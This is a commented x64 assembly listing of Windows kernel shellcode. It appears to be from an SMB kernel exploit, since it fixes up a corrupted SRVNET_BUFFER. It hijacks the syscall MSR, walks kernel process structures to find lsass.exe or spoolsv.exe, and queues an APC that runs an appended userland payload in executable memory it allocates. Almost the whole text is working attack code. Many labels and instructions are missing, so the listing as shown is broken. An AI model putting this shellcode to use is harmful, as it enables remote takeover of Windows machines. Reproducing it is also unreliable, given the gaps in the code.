Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of system process.
If userland shellcode causes any exception, the system process get killed.
On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
get call because system call is called on other processors.
The shellcode do not allocate shadow stack if possible for minimal shellcode size.
It is ok because some Windows function does not require shadow stack.
Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
The userland payload MUST be appened to this shellcode.

Reference: (structures info)

ASM code:


LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
CREATETHREAD_HASH    EQU    0x835e515e

DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start


    ; IRQL is DISPATCH_LEVEL when got code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
    push rbp
    call set_rbp_data_address_fn
    ; read current syscall
    mov ecx, 0xc0000082
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    pop rbp
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax

; Find memory address in HAL heap for using as data area
; Return: rbp = data address
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too

    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ; restore syscall
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    ; allow interrupts while executing shellcode
    call r3_to_r0_start
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ; find nt kernel address
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ; get current EPROCESS and ETHREAD
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    ; find offset of EPROCESS.ImageFilename
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename

    ; find offset of EPROCESS.ThreadListHead
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead

    ; find offset of ETHREAD.ThreadListEntry
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)

    ; find offset of EPROCESS.ActiveProcessLinks
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
    ; check process name
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop

    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    ; iterate ThreadList until KeInsertQueueApc() success
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15

; Call function in specific module
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
    call get_proc_addr
    jmp rax

; Get function address in specific module
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx

; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
    push rdx
    xor eax, eax
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx

; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    mov rbp, [r8]       ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
    ; copy userland payload
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    ; find CreateThread address (in kernel32.dll)
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; first one always be executable, skip it
    lodsq               ; skip ntdll.dll
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop

    mov r15, [rax+0x20]
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp

    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30

